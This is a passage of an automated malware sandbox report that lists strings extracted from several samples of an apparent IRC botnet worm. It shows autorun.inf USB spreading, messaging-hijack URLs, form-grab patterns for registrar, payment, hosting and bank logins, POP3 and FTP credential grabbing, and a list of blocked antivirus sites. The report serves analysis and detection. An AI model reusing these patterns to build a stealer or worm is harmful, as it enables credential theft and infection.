asswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exeBinary or memory string: %sautorun.inf
            Source: 25F.tmp.exeBinary or memory string: [autorun]
            Source: 25F.tmp.exeBinary or memory string: autorun.inf
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 